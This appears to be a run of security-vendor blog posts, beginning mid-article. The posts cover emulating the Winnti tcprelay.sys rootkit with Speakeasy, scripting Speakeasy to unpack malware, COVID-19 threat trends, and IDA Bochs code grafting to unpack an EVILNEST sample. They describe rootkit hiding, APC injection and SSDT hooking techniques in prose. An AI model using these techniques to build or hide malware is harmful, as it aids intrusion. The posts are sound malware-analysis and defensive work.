Speakeasy will then begin emulating the malware’s DriverEntry function. The entry point of a driver is responsible for setting up passive callback routines that will service user mode I/O requests as well as callbacks used for device addition, removal, and unloading. Reviewing the emulation report for the malware’s DriverEntry function (identified in the JSON report with an “ep_type” of “entry_point”), shows that the malware finds the base address of the Windows kernel. The malware does this by using the ZwQuerySystemInformation API to locate the base address for all kernel modules and then looking for one named “ntoskrnl.exe”. The malware then manually finds the address of the PsCreateSystemThread API. This is then used to spin up a system thread to perform its actual functionality. Figure 2 shows the APIs called from the malware's entry point.


Figure 2: Key functionality in the tcprelay.sys entry point

Hiding the Driver Object

The malware attempts to hide itself before executing its main system thread. The malware first looks up the “DriverSection” field in its own DRIVER_OBJECT structure. This field holds a linked list containing all loaded kernel modules and the malware attempts to unlink itself to hide from APIs that list loaded drivers. In the “mem_access” field in the Speakeasy report shown in Figure 3, we can see two memory writes to the DriverSection entries before and after itself which will remove itself from the linked list.


Figure 3: Memory write events representing the tcprelay.sys malware attempting to unlink itself in order to hide

As noted in the original Speakeasy blog post, when threads or other dynamic entry points are created at runtime, the framework will follow them for emulation. In this case, the malware created a system thread and Speakeasy automatically emulated it.

Moving on to the newly created thread (identified by an “ep_type” of “system_thread”), we can see the malware begin its real functionality. The malware begins by enumerating all running processes on the host, looking for the service controller process named services.exe. It's important to note that the process listing that gets returned to the emulated samples is configurable via JSON config files supplied at runtime. For more information on these configuration options please see the Speakeasy README on our GitHub repository. An example of this configurable process listing is shown in Figure 4.


Figure 4: Process listing configuration field supplied to Speakeasy

Pivoting to User Mode

Once the malware locates the services.exe process, it will attach to its process context and begin inspecting user mode memory in order to locate the addresses of exported user mode functions. The malware does this so it can later inject an encoded, memory-resident DLL into the services.exe process. Figure 5 shows the APIs used by the rootkit to resolve its user mode exports.


Figure 5: Logged APIs used by tcprelay.sys rootkit to resolve exports for its user mode implant

Once the exported functions are resolved, the rootkit is ready to inject the user mode DLL component. Next, the malware manually copies the in-memory DLL into the services.exe process address space. These memory write events are captured and shown in Figure 6.


Figure 6: Memory write events captured while copying the user mode implant into services.exe

A common technique that rootkits use to execute user mode code involves a Windows feature known as Asynchronous Procedure Calls (APC). APCs are functions that execute asynchronously within the context of a supplied thread. Using APCs allows kernel mode applications to queue code to run within a thread’s user mode context. Malware often wants to inject into user mode since much of the common functionality (such as network communication) within Windows can be more easily accessed. In addition, by running in user mode, there is less risk of being detected in the event of faulty code bug-checking the entire machine.

In order to queue an APC to fire in user mode, the malware must locate a thread in an “alertable” state. Threads are said to be alertable when they relinquish their execution quantum to the kernel thread scheduler and notify the kernel that they are able to dispatch APCs. The malware searches for threads within the services.exe process and once it detects one that’s alertable it will allocate memory for the DLL to inject then queue an APC to execute it.

Speakeasy emulates all kernel structures involved in this process, specifically the executive thread object (ETHREAD) structures that are allocated for every thread on a Windows system. Malware may attempt to grovel through this opaque structure to identify when a thread’s alertable flag is set (and therefore a valid candidate for an APC). Figure 7 shows the memory read event that was logged when the Winnti malware manually parsed an ETHREAD structure in the services.exe process to confirm it was alertable. At the time of this writing, all threads within the emulator present themselves as alertable by default.


Figure 7: Event logged when the tcprelay.sys malware confirmed a thread was alertable

Next, the malware can execute any user mode code it wants using this thread object. The undocumented functions KeInitializeApc and KeInsertQueueApc will initialize and execute a user mode APC respectively. Figure 8 shows the API set that the malware uses to inject a user mode module into the services.exe process. The malware executes a shellcode stub as the target of the APC that will then execute a loader for the injected DLL. All of this can be recovered from the memory dump package and analyzed later.


Figure 8: Logged APIs used by tcprelay.sys rootkit to inject into user mode via an APC

Network Hooks

After injecting into user mode, the kernel component will attempt to install network obfuscation hooks (presumably to hide the user mode implant). Speakeasy tracks and tags all memory within the emulation space. In the context of kernel mode emulation, this includes all kernel objects (e.g. Driver and Device objects, and the kernel modules themselves). Immediately after we observe the malware inject its user mode implant, we see it begin to attempt to hook kernel components. This was confirmed during static analysis to be used for network hiding.

The memory access section of the emulation report reveals that the malware modified the netio.sys driver, specifically code within the exported function named NsiEnumerateObjectsAllParametersEx. This function is ultimately called when a user on the system runs the “netstat” command and it is likely that the malware is hooking this function in order to hide connected network ports on the infected system. This inline hook was identified by the event captured in Figure 9.


Figure 9: Inline function hook set by the malware to hide network connections

In addition, the malware hooks the Tcpip driver object in order to accomplish additional network hiding. Specifically, the malware hooks the IRP_MJ_DEVICE_CONTROL handler for the Tcpip driver. User mode code may send IOCTL codes to this function when querying for active connections. This type of hook can be easily identified with Speakeasy by looking for memory writes to critical kernel objects as shown in Figure 10.


Figure 10: Memory write event used to hook the Tcpip network driver

System Service Dispatch Table Hooks

Finally, the rootkit will attempt to hide itself using the nearly ancient technique of system service dispatch table (SSDT) patching. Speakeasy allocates a fake SSDT so malware can interact with it. The SSDT is a function table that exposes kernel functionality to user mode code. The event in Figure 11 shows that the SSDT structure was modified at runtime.


Figure 11: SSDT hook detected by Speakeasy

If we look at the malware in IDA Pro, we can confirm that the malware patches the SSDT entry for the ZwQueryDirectoryFile and ZwEnumerateKey APIs that it uses to hide itself from file system and registry analysis. The SSDT patch function is shown in Figure 12.


Figure 12: File hiding SSDT patching function shown in IDA Pro

After setting up these hooks, the system thread will exit. The other entry points (such as the IRP handlers and DriverUnload routines) in the driver are less interesting and contain mostly boilerplate driver code.

Acquiring the Injected User Mode Implant

Now that we have a good idea what the driver does to hide itself on the system, we can use the memory dumps created by Speakeasy to acquire the injected DLL discussed earlier. Opening the zip file we created at emulation time, we can find the memory tag referenced in Figure 6. We quickly confirm the memory block has a valid PE header and it successfully loads into IDA Pro as shown in Figure 13.


Figure 13: Injected user mode DLL recovered from Speakeasy memory dump

Conclusion

In this blog post, we discussed how Speakeasy can be effective at automatically identifying rootkit activity from the kernel mode binary. Speakeasy can be used to quickly triage kernel binaries that may otherwise be difficult to dynamically analyze. For more information and to check out the code, head over to our GitHub repository.

Using Speakeasy Emulation Framework Programmatically to Unpack Malware

1 December 2020 at 20:30

Andrew Davis recently announced the public release of his new Windows emulation framework named Speakeasy. While the introductory blog post focused on using Speakeasy as an automated malware sandbox of sorts, this entry will highlight another powerful use of the framework: automated malware unpacking. I will demonstrate, with code examples, how Speakeasy can be used programmatically to:

  • Bypass unsupported Windows APIs to continue emulation and unpacking
  • Save virtual addresses of dynamically allocated code using API hooks
  • Surgically direct execution to key areas of code using code hooks
  • Dump an unpacked PE from emulator memory and fix its section headers
  • Aid in reconstruction of import tables by querying Speakeasy for symbolic information

Initial Setup

One approach to interfacing with Speakeasy is to create a subclass of Speakeasy’s Speakeasy class. Figure 1 shows a Python code snippet that sets up such a class that will be expanded in upcoming examples.

import speakeasy

class MyUnpacker(speakeasy.Speakeasy):
    def __init__(self, config=None):
        super(MyUnpacker, self).__init__(config=config)

Figure 1: Creating a Speakeasy subclass

The code in Figure 1 accepts a Speakeasy configuration dictionary that may be used to override the default configuration. Speakeasy ships with several configuration files. The Speakeasy class is a wrapper class for an underlying emulator class. The emulator class is chosen automatically when a binary is loaded based on its PE headers or is specified as shellcode. Subclassing Speakeasy makes it easy to access, extend, or modify interfaces. It also facilitates reading and writing stateful data before, during, and after emulation.

Emulating a Binary

Figure 2 shows how to load a binary into the Speakeasy emulator.

self.module = self.load_module(filename)

Figure 2: Loading the binary into the emulator

The load_module function returns a PeFile object for the provided binary on disk. It is an instance of the PeFile class defined in speakeasy/windows/common.py, which is subclassed from pefile’s PE class. Alternatively, you can provide the bytes of a binary using the data parameter rather than specifying a file name. Figure 3 shows how to emulate a loaded binary.

self.run_module(self.module)

Figure 3: Starting emulation

API Hooks

The Speakeasy framework ships with support for hundreds of Windows APIs with more being added frequently. This is accomplished via Python API handlers defined in appropriate files in the speakeasy/winenv/api directory. API hooks can be installed to have your own code executed when particular APIs are called during emulation. They can be installed for any API, regardless of whether a handler exists or not. An API hook can be used to override an existing handler and that handler can optionally be invoked from your hook. The API hooking mechanism in Speakeasy provides flexibility and control over emulation. Let’s examine a few uses of API hooking within the context of emulating unpacking code to retrieve an unpacked payload.

Bypassing Unsupported APIs

When Speakeasy encounters an unsupported Windows API call, it stops emulation and provides the name of the API function that is not supported. If the API function in question is not critical for unpacking the binary, you can add an API hook that simply returns a value that allows execution to continue. For example, a recent sample’s unpacking code contained API calls that had no effect on the unpacking process. One such API call was to GetSysColor. In order to bypass this call and allow execution to continue, an API hook may be added as shown in Figure 4.

self.add_api_hook(self.getsyscolor_hook,
                  'user32',
                  'GetSysColor',
                  argc=1
                  )

Figure 4: Adding an API hook

According to MSDN, this function takes 1 parameter and returns an RGB color value represented as a DWORD. If the calling convention for the API function you are hooking is not stdcall, you can specify the calling convention in the optional call_conv parameter. The calling convention constants are defined in the speakeasy/common/arch.py file. Because the GetSysColor return value does not impact the unpacking process, we can simply return 0. Figure 5 shows the definition of the getsyscolor_hook function specified in Figure 4.

def getsyscolor_hook(self, emu, api_name, func, params):
            return 0

Figure 5: The GetSysColor hook returns 0

If an API function requires more finessed handling, you can implement a more specific and meaningful hook that suits your needs. If your hook implementation is robust enough, you might consider contributing it to the Speakeasy project as an API handler!  

Adding an API Handler

Within the speakeasy/winenv/api directory you'll find usermode and kernelmode subdirectories that contain Python files for corresponding binary modules. These files contain the API handlers for each module. In usermode/kernel32.py, we see a handler defined for SetEnvironmentVariable as shown in Figure 6.

1: @apihook('SetEnvironmentVariable', argc=2)
2: def SetEnvironmentVariable(self, emu, argv, ctx={}):
3:     '''
4:     BOOL SetEnvironmentVariable(
5:         LPCTSTR lpName,
6:         LPCTSTR lpValue
7:         );
8:     '''
9:     lpName, lpValue = argv
10:    cw = self.get_char_width(ctx)
11:    if lpName and lpValue:
12:        name = self.read_mem_string(lpName, cw)
13:        val = self.read_mem_string(lpValue, cw)
14:        argv[0] = name
15:        argv[1] = val
16:        emu.set_env(name, val)
17:    return True

Figure 6: API handler for SetEnvironmentVariable

A handler begins with a function decorator (line 1) that defines the name of the API and the number of parameters it accepts. At the start of a handler, it is good practice to include MSDN's documented prototype as a comment (lines 3-8).

The handler's code begins by storing elements of the argv parameter in variables named after their corresponding API parameters (line 9). The handler's ctx parameter is a dictionary that contains contextual information about the API call. For API functions that end in an ‘A’ or ‘W’ (e.g., CreateFileA), the character width can be retrieved by passing the ctx parameter to the get_char_width function (line 10). This width value can then be passed to calls such as read_mem_string (lines 12 and 13), which reads the emulator’s memory at a given address and returns a string.

It is good practice to overwrite string pointer values in the argv parameter with their corresponding string values (lines 14 and 15). This enables Speakeasy to display string values instead of pointer values in its API logs. To illustrate the impact of updating argv values, examine the Speakeasy output shown in Figure 7. In the VirtualAlloc entry, the symbolic constant string PAGE_EXECUTE_READWRITE replaces the value 0x40. In the GetModuleFileNameA and CreateFileA entries, pointer values are replaced with a file path.

KERNEL32.VirtualAlloc(0x0, 0x2b400, 0x3000, "PAGE_EXECUTE_READWRITE") -> 0x7c000
KERNEL32.GetModuleFileNameA(0x0, "C:\\Windows\\system32\\sample.exe", 0x104) -> 0x58
KERNEL32.CreateFileA("C:\\Windows\\system32\\sample.exe", "GENERIC_READ", 0x1, 0x0, "OPEN_EXISTING", 0x80, 0x0) -> 0x84

Figure 7: Speakeasy API logs

Saving the Unpacked Code Address

Packed samples often use functions such as VirtualAlloc to allocate memory used to store the unpacked sample. An effective approach for capturing the location and size of the unpacked code is to first hook the memory allocation function used by the unpacking stub. Figure 8 shows an example of hooking VirtualAlloc to capture the virtual address and amount of memory being allocated by the API call.

1: def virtualalloc_hook(self, emu, api_name, func, params):
2:     '''
3:     LPVOID VirtualAlloc(
4:        LPVOID lpAddress,
5:        SIZE_T dwSize,
6:        DWORD  flAllocationType,
7:        DWORD  flProtect
8:      );
9:     '''
10:    PAGE_EXECUTE_READWRITE = 0x40
11:    lpAddress, dwSize, flAllocationType, flProtect = params
12:    rv = func(params)
13:    if lpAddress == 0 and flProtect == PAGE_EXECUTE_READWRITE:
14:        self.logger.debug("[*] unpack stub VirtualAlloc call, saving dump info")
15:        self.dump_addr = rv
16:        self.dump_size = dwSize

17:    return rv

Figure 8: VirtualAlloc hook to save memory dump information

The hook in Figure 8 calls Speakeasy’s API handler for VirtualAlloc on line 12 to allow memory to be allocated. The virtual address returned by the API handler is saved to a variable named rv. Since VirtualAlloc may be used to allocate memory not related to the unpacking process, additional checks are used on line 13 to confirm the intercepted VirtualAlloc call is the one used in the unpacking code. Based on prior analysis, we’re looking for a VirtualAlloc call that receives the lpAddress value 0 and the flProtect value PAGE_EXECUTE_READWRITE (0x40). If these arguments are present, the virtual address and specified size are stored on lines 15 and 16 so they may be used to extract the unpacked payload from memory after the unpacking code is finished. Finally, on line 17, the return value from the VirtualAlloc handler is returned by the hook.

Surgical Code Emulation Using API and Code Hooks

Speakeasy is a robust emulation framework; however, you may encounter binaries that have large sections of problematic code. For example, a sample may call many unsupported APIs or simply take far too long to emulate. An example of overcoming both challenges is described in the following scenario.

Unpacking Stubs Hiding in MFC Projects

A popular technique used to disguise malicious payloads involves hiding them inside a large, open-source MFC project. MFC is short for Microsoft Foundation Class, which is a popular library used to build Windows desktop applications. These MFC projects are often arbitrarily chosen from popular Web sites such as Code Project. While the MFC library makes it easy to create desktop applications, MFC applications are difficult to reverse engineer due to their size and complexity. They are particularly difficult to emulate due to their large initialization routine that calls many different Windows APIs. What follows is a description of my experience with writing a Python script using Speakeasy to automate unpacking of a custom packer that hides its unpacking stub within an MFC project.

Reverse engineering the packer revealed the unpacking stub is ultimately called during initialization of the CWinApp object, which occurs after initialization of the C runtime and MFC. After attempting to bypass unsupported APIs, I realized that, even if successful, emulation would take far too long to be practical. I considered skipping over the initialization code completely and jumping straight to the unpacking stub. Unfortunately, execution of the C-runtime initialization code was required in order for emulation of the unpacking stub to succeed.

My solution was to identify a location in the code that fell after the C-runtime initialization but was early in the MFC initialization routine. After examining the Speakeasy API log shown in Figure 9, such a location was easy to spot. The graphics-related API function GetDeviceCaps is invoked early in the MFC initialization routine. This was deduced based on 1) MFC is a graphics-dependent framework and 2) GetDeviceCaps is unlikely to be called during C-runtime initialization.

0x43e0a7: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e0e3: 'kernel32.DecodePointer(0x7049)' -> 0x7048
0x43b16a: 'KERNEL32.HeapSize(0x4130, 0x0, 0x7000)' -> 0x90
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x44e215)' -> 0x44e216
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x704c)' -> 0x704d
0x43c260: 'KERNEL32.LeaveCriticalSection(0x466f28)' -> None
0x422151: 'USER32.GetSystemMetrics(0xb)' -> 0x1
0x422158: 'USER32.GetSystemMetrics(0xc)' -> 0x1
0x42215f: 'USER32.GetSystemMetrics(0x2)' -> 0x1
0x422169: 'USER32.GetSystemMetrics(0x3)' -> 0x1
0x422184: 'GDI32.GetDeviceCaps(0x288, 0x58)' -> None

Figure 9: Identifying beginning of MFC code in Speakeasy API logs

To intercept execution at this stage I created an API hook for GetDeviceCaps as shown in Figure 10. The hook confirms the function is being called for the first time on line 2.

1: def mfc_init_hook(self, emu, api_name, func, params):
2:     if not self.trigger_hit:
3:         self.trigger_hit = True
4:         self.h_code_hook =   self.add_code_hook(self.start_unpack_func_hook)
5:         self.logger.debug("[*] MFC init api hit, starting unpack function")

Figure 10: API hook set for GetDeviceCaps

Line 4 shows the creation of a code hook using the add_code_hook function of the Speakeasy class. Code hooks allow you to specify a callback function that is called before each instruction that is emulated. Speakeasy also allows you to optionally specify an address range for which the code hook will be effective by specifying begin and end parameters.

After the code hook is added on line 4, the GetDeviceCaps hook completes and, prior to the execution of the sample's next instruction, the start_unpack_func_hook function is called. This function is shown in Figure 11.

1: def start_unpack_func_hook(self, emu, addr, size, ctx):
2:     self.h_code_hook.disable()
3:     unpack_func_va = self.module.get_rva_from_offset(self.unpack_offs) + self.module.get_base()
4:     self.set_pc(unpack_func_va)

Figure 11: Code hook that changes the instruction pointer

The code hook receives the emulator object, the address and size of the current instruction, and the context dictionary (line 1). On line 2, the code hook disables itself. Because code hooks are executed with each instruction, this slows emulation significantly. Therefore, they should be used sparingly and disabled as soon as possible. On line 3, the hook calculates the virtual address of the unpacking function. The offset used to perform this calculation was located using a regular expression. This part of the example was omitted for the sake of brevity.

The self.module attribute was previously set in the example code shown in Figure 2. It being subclassed from the PE class of pefile allows us to access useful functions such as get_rva_from_offset() on line 3. This line also includes an example of using self.module.get_base() to retrieve the module's base virtual address.

Finally, on line 4, the instruction pointer is changed using the set_pc function and emulation continues at the unpacking code. The code snippets in Figure 10 and Figure 11 allowed us to redirect execution to the unpacking code after the C-runtime initialization completed and avoid MFC initialization code.

Dumping and Fixing Unpacked PEs

Once emulation has reached the original entry point of the unpacked sample, it is time to dump the PE and fix it up. Typically, a hook would save the base address of the unpacked PE in an attribute of the class as illustrated on line 15 of Figure 8. If the unpacked PE does not contain the correct entry point in its PE headers, the true entry point may also need to be captured during emulation. Figure 12 shows an example of how to dump emulator memory to a file.

with open(self.output_path, "wb") as up:
    mm = self.get_address_map(self.dump_addr)
    up.write(self.mem_read(mm.get_base(), mm.get_size()))

Figure 12: Dumping the unpacked PE

If you are dumping a PE that has already been loaded in memory, it will not have the same layout as it does on disk due to differences in section alignment. As a result, the dumped PE's headers may need to be modified. One approach is to modify each section's PointerToRawData value to match its VirtualAddress field. Each section's SizeOfRawData value may need to be padded in order conform with the FileAlignment value specified in the PE’s optional headers. Keep in mind the resulting PE is unlikely to execute successfully. However, these efforts will allow most static analysis tools to function correctly.

The final step for repairing the dumped PE is to fix its import table. This is a complex task deserving of its own blog post and will not be discussed in detail here. However, the first step involves collecting a list of library function names and their addresses in emulator memory. If you know the GetProcAddress API is used by the unpacker stub to resolve imports for the unpacked PE, you can call the get_dyn_imports function as shown in Figure 13.

api_addresses = self.get_dyn_imports()

Figure 13: Retrieving dynamic imports

Otherwise, you can query the emulator class to retrieve its symbol information by calling the get_symbols function as shown in Figure 14.

symbols = self.get_symbols()

Figure 14: Retrieve symbol information from emulator class

This data can be used to discover the IAT of the unpacked PE and fix or reconstruct its import related tables.

Putting It All Together

Writing a Speakeasy script to unpack a malware sample can be broken down into the following steps:

  1. Reverse engineer the unpacking stub to identify: 1) where the unpacked code will reside or where its memory is allocated, 2) where execution is transferred to the unpacked code, and 3) any problematic code that may introduce issues such as unsupported APIs, slow emulation, or anti-analysis checks.
  2. If necessary, set hooks to bypass problematic code.
  3. Set a hook to identify the virtual address and, optionally, the size of the unpacked binary.
  4. Set a hook to stop emulation at, or after, execution of the original entry point of the unpacked code.
  5. Collect virtual addresses of Windows APIs and reconstruct the PE’s import table.
  6. Fix the PE’s headers (if applicable) and write the bytes to a file for further analysis.

For an example of a script that unpacks UPX samples, check out the UPX unpacking script in the Speakeasy repository.

Conclusion

The Speakeasy framework provides an easy-to-use, flexible, and powerful programming interface that enables analysts to solve complex problems such as unpacking malware. Using Speakeasy to automate these solutions allows them to be performed at scale. I hope you enjoyed this introduction to automating the Speakeasy framework and are inspired to begin using it to implement your own malware analysis solutions!

Limited Shifts in the Cyber Threat Landscape Driven by COVID-19

8 April 2020 at 16:15

Though COVID-19 has had enormous effects on our society and economy, its effects on the cyber threat landscape remain limited. For the most part, the same actors we have always tracked are behaving in the same manner they did prior to the crisis. There are some new challenges, but they are perceptible, and we—and our customers—are prepared to continue this fight through this period of unprecedented change.

The significant shifts in the threat landscape we are currently tracking include:

  • The sudden major increase in a remote workforce has changed the nature and vulnerability of enterprise networks.
  • Threat actors are now leveraging COVID-19 and related topics in social engineering ploys.
  • We anticipate increased collection by cyber espionage actors seeking to gather intelligence on the crisis.
  • Healthcare operations, related manufacturing, logistics, and administration organizations, as well as government offices involved in responding to the crisis are increasingly critical and vulnerable to disruptive attacks such as ransomware.
  • Information operations actors have seized on the crisis to promote narratives primarily to domestic or near-abroad audiences.

Same Actors, New Content

The same threat actors and malware families that we observed prior to the crisis are largely pursuing the same objectives as before the crisis, using many of the same tools. They are simply now leveraging the crisis as a means of social engineering. This pattern of behavior is familiar. Threat actors have always capitalized on major events and crises to entice users. Many of the actors who are now using this approach have been tracked for years.

Ultimately, COVID-19 is being adopted broadly in social engineering approaches because it is has widespread, generic appeal, and there is a genuine thirst for information on the subject that encourages users to take actions when they might otherwise have been circumspect. We have seen it used by several cyber criminal and cyber espionage actors, and in underground communities some actors have created tools to enable effective social engineering exploiting the coronavirus pandemic. Nonetheless, COVID-19 content is still only used in two percent of malicious emails.

 

For the time being, we do not believe this social engineering will be abetting. In fact, it is likely to take many forms as changes in policy, economics, and other unforeseen consequences manifest. Recently we predicted a spike in stimulus related social engineering, for example. Additionally, the FBI has recently released a press release anticipating a rise in COVID-19 related Business Email Compromise (BEC) scams.

State Actors Likely Very Busy

Given that COVID-19 is the undoubtedly the overwhelming concern of governments worldwide for the time being, we anticipated targeting of government, healthcare, biotech, and other sectors by cyber espionage actors. We have not yet observed an incident of cyber espionage targeting COVID-19 related information; however, it is often difficult to determine what information these actors are targeting. There has been at least one case reported publicly which we have not independently confirmed.

We have seen state actors, such as those from Russia, China and North Korea, leverage COVID-19 related social engineering, but given wide interest in that subject, that does not necessarily indicate targeting of COVID-19 related information.

Threat to Healthcare

Though we have no reason to believe there is a sudden, elevated threat to healthcare, the criticality of these systems has probably never been greater, and thus the risk to this sector will be elevated throughout this crisis. The threat of disruption is especially disconcerting as it could affect the ability of these organizations to provide safe and timely care. This threat extends beyond hospitals to pharmaceutical companies, as well as manufacturing, administration and logistics organizations providing vital support. Additionally, many critical public health resources lie at the state and local level.

Though there is some anecdotal evidence suggesting some ransomware actors are avoiding healthcare targets, we do not expect that all actors will practice this restraint. Additionally, an attack on state and local governments, which have been a major target of ransomware actors, could have a disruptive effect on treatment and prevention efforts.

Remote Work

The sudden and unanticipated shift of many workers to work from home status will represent an opportunity for threat actors. Organizations will be challenged to move quickly to ensure sufficient capacity, as well as that security controls and policies are in place. Disruptive situations can reduce morale and increase stress, leading to adverse behavior such as decreasing users’ reticence to open suspicious messages, and even increasing the risk of insider threats. Distractions while working at home can cause lowered vigilance in scrutinizing and avoiding suspicious content as workers struggle to balance work and home responsibilities at the same time. Furthermore, the rapid adoption of platforms will undoubtedly lead to security mistakes and attract the attention of the threat actors.

Secure remote access will likely rely on use of VPNs and user access permissions and authentication procedures intended to limit exposure of proprietary data. Hardware and infrastructure protection should include ensuring full disk encryption on enterprise devices, maintaining visibility on devices through an endpoint security tool, and maintaining regular software updates. 

For more on this issue, see our blog post on the risks associated with remote connectivity.

The Information Operations Threat

We have seen information operations actors promote narratives associated with COVID-19 to manipulate primarily domestic or near-abroad audiences. We observed accounts in Chinese-language networks operating in support of the People's Republic of China (PRC), some of which we previously identified to be promoting messaging pertaining to the Hong Kong protests, shift their focus to praising the PRC's response to the COVID-19 outbreak, criticizing the response of Hong Kong medical workers and the U.S. to the pandemic, and covertly promoting a conspiracy theory that the U.S. was responsible for the outbreak of the coronavirus in Wuhan.

We have also identified multiple information operations promoting COVID-19-related narratives that were aimed at Russian- and Ukrainian-speaking audiences, including some that we assess with high confidence are part of the broader suspected Russian influence campaign publicly referred to as "Secondary Infektion," as well as other suspected Russian activity. These operations have included leveraging a false hacktivist persona to spread the conspiracy theory that the U.S. developed the coronavirus in a weapons laboratory in Central Asia, taking advantage of physical protests in Ukraine to push the narrative that Ukrainians repatriated from Wuhan will infect the broader Ukrainian population, and claiming that the Ukrainian healthcare system is ill-equipped to deal with the pandemic. Other operations alleged that U.S. government or military personnel were responsible for outbreaks of the coronavirus in various countries including Lithuania and Ukraine, or insisted that U.S. personnel would contribute to the pandemic's spread if scheduled multilateral military exercises in the region were to continue as planned.

Outlook

It is clear that adversaries expect us to be distracted by these overwhelming events. The greatest cyber security challenge posed by COVID-19 may be our ability to stay focused on the threats that matter most. An honest assessment of the cyber security implications of the pandemic will be necessary to make efficient use of resources limited by the crisis itself.

For more information and resources that can help strengthen defenses, visit FireEye's "Managing Through Change and Crisis" site, which aggregates many resources to help organizations that are trying to navigate COVID-19 related security challenges.

Thinking Outside the Bochs: Code Grafting to Unpack Malware in Emulation

7 April 2020 at 16:00

This blog post continues the FLARE script series with a discussion of patching IDA Pro database files (IDBs) to interactively emulate code. While the fastest way to analyze or unpack malware is often to run it, malware won’t always successfully execute in a VM. I use IDA Pro’s Bochs integration in IDB mode to sidestep tedious debugging scenarios and get quick results. Bochs emulates the opcodes directly from your IDB in a Bochs VM with no OS.

Bochs IDB mode eliminates distractions like switching VMs, debugger setup, neutralizing anti-analysis measures, and navigating the program counter to the logic of interest. Alas, where there is no OS, there can be no loader or dynamic imports. Execution is constrained to opcodes found in the IDB. This precludes emulating routines that call imported string functions or memory allocators. Tom Bennett’s flare-emu ships with emulated versions of these, but for off-the-cuff analysis (especially when I don’t know if there will be a payoff), I prefer interactively examining registers and memory to adjust my tactics ad hoc.

What if I could bring my own imported functions to Bochs like flare-emu does? I’ve devised such a technique, and I call it code grafting. In this post I’ll discuss the particulars of statically linking stand-ins for common functions into an IDB to get more mileage out of Bochs. I’ll demonstrate using this on an EVILNEST sample to unpack and dump next-stage payloads from emulated memory. I’ll also show how I copied a tricky call sequence from one IDB to another IDB so I could keep the unpacking process all in a single Bochs debug session.

EVILNEST Scenario

My sample (MD5 hash 37F7F1F691D42DCAD6AE740E6D9CAB63 which is available on VirusTotal) was an EVILNEST variant that populates the stack with configuration data before calling an intermediate payload. Figure 1 shows this unusual call site.


Figure 1: Call site for intermediate payload

The code in Figure 1 executes in a remote thread within a hollowed-out iexplore.exe process; the malware uses anti-analysis tactics as well. I had the intermediate payload stage and wanted to unpack next-stage payloads without managing a multi-process debugging scenario with anti-analysis. I knew I could stub out a few function calls in the malware to run all of the relevant logic in Bochs. Here’s how I did it.

Code Carving

I needed opcodes for a few common functions to inject into my IDBs and emulate in Bochs. I built simple C implementations of selected functions and compiled them into one binary. Figure 2 shows some of these stand-ins.


Figure 2: Simple implementations of common functions

I compiled this and then used IDAPython code similar to Figure 3 to extract the function opcode bytes.


Figure 3: Function extraction

I curated a library of function opcodes in an IDAPython script as shown in Figure 4. The nonstandard function opcodes at the bottom of the figure were hand-assembled as tersely as possible to generically return specific values and manipulate the stack (or not) in conformance with calling conventions.


Figure 4: Extracted function opcodes

On top of simple functions like memcpy, I implemented a memory allocator. The allocator referenced global state data, meaning I couldn’t just inject it into an IDB and expect it to work. I read the disassembly to find references to global operands and templatize them for use with Python’s format method. Figure 5 shows an example for malloc.


Figure 5: HeapAlloc template code

I organized the stubs by name as shown in Figure 6 both to call out functions I would need to patch, and to conveniently add more function stubs as I encounter use cases for them. The mangled name I specified as an alias for free is operator delete.


Figure 6: Function stubs and associated names

To inject these functions into the binary, I wrote code to find the next available segment of a given size. I avoided occupying low memory because Bochs places its loader segment below 0x10000. Adjacent to the code in my code  segment, I included space for the data used by my memory allocator. Figure 7 shows the result of patching these functions and data into the IDB and naming each location (stub functions are prefixed with stub_).


Figure 7: Data and code injected into IDB

The script then iterates all the relevant calls in the binary and patches them with calls to their stub implementations in the newly added segment. As shown in Figure 8, IDAPython’s Assemble function saved the effort of calculating the offset for the call operand manually. Note that the Assemble function worked well here, but for bigger tasks, Hex-Rays recommends a dedicated assembler such as Keystone Engine and its Keypatch plugin for IDA Pro.


Figure 8: Abbreviated routine for assembling a call instruction and patching a call site to an import

The Code Grafting script updated all the relevant call sites to resemble Figure 9, with the target functions being replaced by calls to the stub_ implementations injected earlier. This prevented Bochs in IDB mode from getting derailed when hitting these call sites, because the call operands now pointed to valid code inside the IDB.


Figure 9: Patched operator new() call site

Dealing with EVILNEST

The debug scenario for the dropper was slightly inconvenient, and simultaneously, it was setting up a very unusual call site for the payload entry point. I used Bochs to execute the dropper until it placed the configuration data on the stack, and then I used IDAPython’s idc.get_bytes function to extract the resulting stack data. I wrote IDAPython script code to iterate the stack data and assemble push instructions into the payload IDB leading up to a call instruction pointing to the DLL’s export. This allowed me to debug the unpacking process from Bochs within a single session.

I clicked on the beginning of my synthesized call site and hit F4 to run it in Bochs. I was greeted with the warning in Figure 10 indicating that the patched IDB would not match the depictions made by the debugger (which is untrue in the case of Bochs IDB mode). Bochs faithfully executed my injected opcodes producing exactly the desired result.


Figure 10: Patch warning

I watched carefully as the instruction pointer approached and passed the IsDebuggerPresent check. Because of the stub I injected (stub_IsDebuggerPresent), it passed the check returning zero as shown in Figure 11.


Figure 11: Passing up IsDebuggerPresent

I allowed the program counter to advance to address 0x1A1538, just beyond the unpacking routine. Figure 12 shows the register state at this point which reflects a value in EAX that was handed out by my fake heap allocator and which I was about to visit.


Figure 12: Running to the end of the unpacker and preparing to view the result

Figure 13 shows that there was indeed an IMAGE_DOS_SIGNATURE (“MZ”) at this location. I used idc.get_bytes() to dump the unpacked binary from the fake heap location and saved it for analysis.


Figure 13: Dumping the unpacked binary

Through Bochs IDB mode, I was also able to use the interactive debugger interface of IDA Pro to experiment with manipulating execution and traversing a different branch to unpack another payload for this malware as well.

Conclusion

Although dynamic analysis is sometimes the fastest road, setting it up and navigating minutia detract from my focus, so I’ve developed an eye for routines that I can likely emulate in Bochs to dodge those distractions while still getting answers. Injecting code into an IDB broadens the set of functions that I can do this with, letting me get more out of Bochs. This in turn lets me do more on-the-fly experimentation, one-off string decodes, or validation of hypotheses before attacking something at scale. It also allows me to experiment dynamically with samples that won’t load correctly anyway, such as unpacked code with damaged or incorrect PE headers.

